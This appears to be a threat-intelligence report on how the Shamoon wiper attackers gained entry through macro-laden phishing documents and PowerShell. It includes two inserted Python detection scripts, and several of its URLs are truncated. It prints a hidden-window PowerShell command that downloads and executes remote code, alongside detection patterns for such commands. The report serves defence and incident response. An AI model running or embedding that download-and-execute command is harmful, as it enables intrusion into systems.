Authored by the IBM X-Force Incident Response and Intelligence Services (IRIS) team.

Researchers from the IBM X-Force Incident Response and Intelligence Services (IRIS) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations. These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states. Shamoon is designed to destroy computer hard drives by wiping the master boot record (MBR) and data irretrievably, unlike ransomware, which holds the data hostage for a fee.

Through their recent investigations, our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures. It’s worth mentioning that, according to X-Force IRIS, the initial compromise took place weeks before the actual Shamoon deployment and activation were launched.

Shamoon Attacks Preceded by Malicious Macros and PowerShell Commands

Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks, X-Force IRIS responders sought out the attackers’ entry point. Their findings pointed to what appears to be the initial point of compromise: a document containing a malicious macro that, when approved to execute, enabled command-and-control (C2) communications with the attacker’s server and a remote shell via PowerShell.

The document was not the only one discovered in the recent attack waves. X-Force IRIS researchers had been tracking earlier activity associated with similar malicious, PowerShell-laden documents themed as resumes and human resources documents, some of which related to organizations in Saudi Arabia. This research identified several bouts of offensive activity that occurred in the past few months, which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network.


Initial Compromise Vector Previously Unclear

Although Shamoon was previously documented in research blogs, the specific network compromise methods leading to the attacks have remained unclear in the reported cases. X-Force IRIS researchers studied Shamoon’s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies. This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:

  1. Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
  2. Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
  3. Attackers can now communicate with the compromised machine and remotely execute commands on it.
  4. The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
  5. Attackers study the network by connecting to additional systems and locating critical servers.
  6. The attackers deploy the Shamoon malware.
  7. A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.

Figure 1: Shamoon Attack — Logical Flow of Events

A Phish Is Speared

X-Force IRIS identified the below malicious document:

Detail        Info
File name     cv_itworx.doc
MD5           45b0e5a457222455384713905f886bd4
SHA256        528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
Hosting URL   hxxp://[.]me/cv_itworx.doc
Decode        PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://’)”
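Detection logic for the decoded command in the table above, added here as an example and not part of the X-Force IRIS analysis: it maps abbreviated powershell.exe switches (-w, -noni, -nop, -c) to their full names and flags a hidden window combined with an iex/DownloadString download-and-execute. The function names, the alert rule and every sample command line except the one copied from the table are assumptions.

```python
import re

# Full powershell.exe parameter name -> shortest abbreviation matched here
# (the abbreviations are the ones used in the decoded command above).
PARAMS = {"windowstyle": "w", "noninteractive": "noni",
          "noprofile": "nop", "command": "c"}
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH = re.compile(r"\bdownloadstring\b", re.I)

def expand(token):
    """Map '-nop', '-NoProfile', '-w' ... to a full parameter name, or None."""
    name = token.lstrip("-/").lower()
    for full, shortest in PARAMS.items():
        if full.startswith(name) and name.startswith(shortest):
            return full
    return None

def findings(cmdline):
    """Return the suspicious traits found in one process command line."""
    tokens = cmdline.split() or [""]
    image = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    if image not in ("powershell.exe", "powershell"):
        return set()
    found = set()
    for i, tok in enumerate(tokens):
        param = expand(tok) if tok[0] in "-/" else None
        value = "".join(tokens[i + 1:i + 2]).lower()
        if param == "windowstyle" and value == "hidden":
            found.add("hidden-window")
        elif param in ("noprofile", "noninteractive"):
            found.add(param)
        elif param == "command":
            break  # everything after -Command is script text, not switches
    if IEX.search(cmdline) and FETCH.search(cmdline):
        found.add("download-cradle")
    return found

def is_alert(cmdline):
    """Alert on a hidden window combined with download-and-execute."""
    return {"hidden-window", "download-cradle"} <= findings(cmdline)

# Constructed samples; PAGE_CMD is the decoded command as printed above.
PAGE_CMD = ("PowerShell.exe -w hidden -noni -nop -c "
            "“iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://’)”")
FULL_NAMES = (r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile '
              r'-WindowStyle Hidden -Command "Invoke-Expression '
              r'(New-Object Net.WebClient).DownloadString($u)"')
BENIGN = r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"
```

Feed it the command-line field of process-creation events; matching on full names alone would miss the abbreviated form this actor used.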

Our researchers examined the domain that hosted the first malicious file, [.]me. Per the domain’s WHOIS record, an anonymized registrant registered com-ho[.]me in October 2016 and used it to serve malicious documents with similar macro activation features, including the following:

File Name                            File MD5
cv.doc                               f4d18316e367a80e1005f38445421b1f
cv_itworx.doc                        45b0e5a457222455384713905f886bd4
cv_mci.doc                           f4d18316e367a80e1005f38445421b1f
discount_voucher_codes.xlsm          19cea065aa033f5bcfa94a583ae59c08
Health_insurance_plan.doc            ecfc0275c7a73a9c7775130ebca45b74
Health_insurance_registration.doc    1b5e33e5a244d2d67d7a09c4ccf16e56
job_titles.doc                       fa72c068361c05da65bf2117db76aaa8
job_titles_itworx.doc                43fad2d62bc23ffdc6d301571135222c
job_titles_mci.doc                   ce25f1597836c28cf415394fb350ae93
Password_Policy.xlsm                 03ea9457bf71d51d8109e737158be888

These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload.

A closer review of the file names revealed “IT Worx” and “MCI.” A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt. MCI is Saudi Arabia’s Ministry of Commerce and Investment. It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment.

X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern: briefl[.]ink/{a-z0-9}[5].

File Detail   Info
File name     job_titles_itworx.doc
MD5           43fad2d62bc23ffdc6d301571135222c
SHA256        e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
Hosting URL   hxxp://
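A proxy-log hunt for the URL-shortening pattern described above, added here as an example and not taken from the X-Force IRIS research: it refangs defanged URLs, then requires the exact host and a five-character lowercase alphanumeric path so that lookalike hosts and longer paths do not match. The log layout, client addresses and five-character codes are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# briefl[.]ink/{a-z0-9}[5] from the write-up: exact host, five-character path.
SHORT_HOST = "briefl.ink"
SHORT_PATH = re.compile(r"/[a-z0-9]{5}")


def refang(url):
    """Undo hxxp / [.] defanging and make sure the host is parseable."""
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.I).replace("[.]", ".")
    return url if "://" in url else "//" + url


def is_shortener_hit(url):
    """True only for SHORT_HOST itself with a path matching the pattern."""
    try:
        parts = urlsplit(refang(url))
    except ValueError:  # malformed bracketed host: treat as no match
        return False
    host = (parts.hostname or "").rstrip(".")
    return host == SHORT_HOST and SHORT_PATH.fullmatch(parts.path) is not None


def hunt(log_lines):
    """Return (client, url) for each proxy line that hits the pattern.

    Assumed line layout: '<timestamp> <client> <method> <url> <status>'.
    """
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) == 5 and is_shortener_hit(fields[3]):
            hits.append((fields[1], fields[3]))
    return hits


# Constructed proxy log; the five-character codes are placeholders.
SAMPLE_LOG = [
    "2017-01-10T08:01:12Z 10.0.0.21 GET http://briefl.ink/ab12c 200",
    "2017-01-10T08:01:40Z 10.0.0.22 GET hxxp://briefl[.]ink/zz9q0?src=mail 200",
    "2017-01-10T08:02:03Z 10.0.0.23 GET http://briefl.ink/ab12cd 404",
    "2017-01-10T08:02:19Z 10.0.0.24 GET http://briefl.ink.example.net/ab12c 200",
    "2017-01-10T08:02:44Z 10.0.0.25 GET http://BRIEFL.INK./q7w8e 200",
]
```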

The following figure is a visual example of what employees may have encountered when they opened the malicious Word files sent to them in preparation for a Shamoon attack:

Figure 2: Malicious Word Document Delivered in Preparation of a Shamoon Malware Attack (Source: X-Force IRIS)

Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure, identifying additional domains used by the threat actors.

Domain Name          Spoofed Site
ntg-sa[.]com         The domain ntg-sa[.]com appears to spoof the legit domain associated with the Namer Trading Group. Per their webpage, NTG “was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia.”
maps-modon[.]club    The maps-modon[.]club domain appears to spoof, which is associated with the Saudi Industrial Property Authority, an organization “responsible for the development of industrial cities with integrated infrastructure and services.”

X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com. This file duped targets into believing it was a Flash player installer; it would drop a Windows batch file that invokes PowerShell to establish the same C2 communications.

Breakdown of the PowerShell-Related Macro

Analysis of one of the threat actor’s documents found that if the macro executes, it launches two separate PowerShell scripts. The first one executes a PowerShell script served from hxxp:// The host is possibly related to attacks that served the Pupy RAT, a publicly available cross-platform remote access tool.

The second script calls VirtualAlloc to create a buffer, uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread. Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine. The shellcode performs a DWORD XOR of 4 bytes at an offset from its own beginning; this changes the code to create a loop, so the XOR continues 0x57 times.

If this execution is successful, it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from hxxp:// This is then returned as a string to PowerShell, which calls invoke-expression (iex) on it, indicating that the expected payload is PowerShell.

Of note, the macro contained a DownloadFile() function that would use URLDownloadToFileA, but this was never actually used.

In activity associated with the malicious document, we observed subsequent shell sessions, probably associated with Metasploit’s Meterpreter, that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys.

Shamoon’s Back, But for How Long This Time?

Although the complete list of Shamoon’s victims is not public, Bloomberg reported that in one case, thousands of computers were destroyed at the headquarters of Saudi’s General Authority of Civil Aviation, erasing critical data and bringing operations to a halt for several days.

The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves, but those are likely to subside following the public attention the cases have garnered since late 2016.

Saudi Arabia released a warning to local organizations about the Shamoon malware, alerting about potential attacks and advising organizations to prepare. Analysis and warnings about Shamoon are resulting in preparation on the targets’ end, and actors are likely to disappear and change their tactics until the next wave of attacks.


For technical details on this research and related indicators of compromise, see the X-Force Advisory on X-Force Exchange.
